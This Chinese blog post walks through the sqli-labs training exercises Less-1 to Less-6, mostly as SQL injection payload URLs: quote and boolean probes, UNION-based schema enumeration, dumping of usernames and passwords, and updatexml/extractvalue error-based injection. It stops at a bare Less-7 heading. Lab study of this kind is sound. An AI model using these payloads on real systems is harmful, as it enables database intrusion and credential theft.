• SQLi注入-实战篇-2020-04-07


    SQL注入点判断:

    1、单引号判断

    http://localhost/sqli/Less-1/?id=1' 如果出现错误提示,则该网站可能就存在注入漏洞

    2、and判断

    http://localhost/sqli/Less-1/?id=1' and 1=1--+ 这个条件永远都是真的,所以当然返回是正常页

    http://localhost/sqli/Less-1/?id=1' and 1=2--+ 如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。

    3、OR判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)

    http://localhost/sqli/Less-1/?id=1' or 1=1--+

    http://localhost/sqli/Less-1/?id=1' or 1=2--+

    两个语句都是返回正确,这就是证明有注入点。

    4、xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)

    http://localhost/sqli/Less-1/?id=1' xor 1=1--+ #返回错误的页面,存在注入点

    http://localhost/sqli/Less-1/?id=1' xor 1=2--+ #返回正确的页面,存在注入点

    5、加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)

    http://localhost/sqli/Less-2/?id=10-0 #正常

    http://localhost/sqli/Less-2/?id=10-1 #正常

    http://localhost/sqli/Less-2/?id=10+1 #错误

    6、输入框判断

    可以使用特殊符号去判断

    #@!$/...

    登录框注入,使用@,--都无效,但是使用报错,这时候上sqlmap,发现可以注入。

     

    第一关  ('单引号闭合)

    http://localhost/sqli/Less-1/

    http://localhost/sqli/Less-1/?id=1'  数据库报错,认为这里有注入点

    http://localhost/sqli/Less-1/?id=1' order by 3--+  判断有多少个列数 

    http://localhost/sqli/Less-1/?id=-1' union select 1,2,3--+  union注入开始

    http://localhost/sqli/Less-1/?id=-1' union select 1,database(),3--+  得到数据库security

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables  where table_schema=database()--+  获取表名 users

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns  where table_name='users'--+  获取表字段  username,password

    http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(username,'|',password),3 from users--+  账号密码

    第二关  (无需闭合注入)

    http://localhost/sqli/Less-2

    http://127.0.0.1/sqli/Less-2/?id=1' #数据库报错,这里有上传点

    http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+ #等到列数是3

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ #union注入 http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3--+ #得到数据库是security

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #获得数据表名是users

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #获取表的字段

    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(password,'~',username),3 from users--+ #用户名和密码

    第三关  (")双引号加括号闭合)

    http://localhost/sqli/Less-3

    http://localhost/sqli/Less-3/?id=1' #看到报错信息,尝试')作为闭合点

    http://localhost/sqli/Less-3/?id=1') and 1=1--+ #无报错证明,闭合成功

    http://localhost/sqli/Less-3/?id=-1') order by 3--+ #测出列数为3

    http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3--+ #得到数据库security

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #得到数据表users

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #得到数据表的字段username和password

    http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(username,'~',password),3 from users--+ #获得用户名和密码

    第四关  (')单引号加括号闭合)

    http://localhost/sqli/Less-4

    http://localhost/sqli/Less-4/?id=1%27  #单引号没有报错信息

    http://localhost/sqli/Less-4?id=1"  #看到报错信息,确定报错语句是双引号

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

    http://localhost/sqli/Less-4?id=1"--+  #构造一个正确的闭合条件

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    http://localhost/sqli/Less-4?id=1")--+  #返回正常,闭合成功

    http://localhost/sqli/Less-4?id=1") order by 3--+  #获取列数3

    http://localhost/sqli/Less-4?id=-1") union select 1,database(),3--+  #得到数据库security

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",table_name),3 from information_schema.tables where table_schema=database()--+  #得到数据表users

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",column_name),3 from information_schema.columns where table_name='users'--+  #得到users表的字段username,password

    http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",username,"~",password),3 from users--+  #得到数据库user的用户名和密码

    第五关  ('单引号闭合&&updatexml报错注入)

    http://localhost/sqli/Less-5

    http://localhost/sqli/Less-5/?id=1'  #报错了,显然知道单引号是关键

    http://localhost/sqli/Less-5/?id=1' order by 3--+  #报错列数为3

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1)),3--+  #得到数据库security

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)),3--+  #得到数据表users

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)),3--+  #得到数据库字段password

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1)),3--+  #得到数据库字段username

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)),3--+  #用户名Dumb

    http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)),3--+  #密码Dumb

     第六关  ("双引号闭合&&extractvalue报错注入)

     http://localhost/sqli/Less-6

    http://localhost/sqli/Less-6/?id=6"--+ #很明显的说双引号就是闭合点

    http://localhost/sqli/Less-6/?id=6" order by 3--+ #列数为3

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select database()),0x7e))),3--+ #数据库security

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))),3--+ #数据表users

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e))),3--+ #数据表的字段password

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e))),3--+ #数据表的字段username

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select username from users limit 7,1),0x7e))),3--+ #获得用户名admin

    http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select password from users limit 7,1),0x7e))),3--+ #获得密码admin

      第七关   

      http://localhost/sqli/Less-7

     

  • 相关阅读:
    "rel=nofollow"属性简介
    js获取微信code
    css--clearfix浮动
    css3--之HSL颜色
    数据库列名为关键字如何搜索
    flexigrid
    easyui-dialog
    关于在jsp中的表达式
    jquery 中 $('div','li')
    myeclipse中常用的快捷键
  • 原文地址:https://www.cnblogs.com/llcn/p/12654146.html
Copyright © 2020-2023  润新知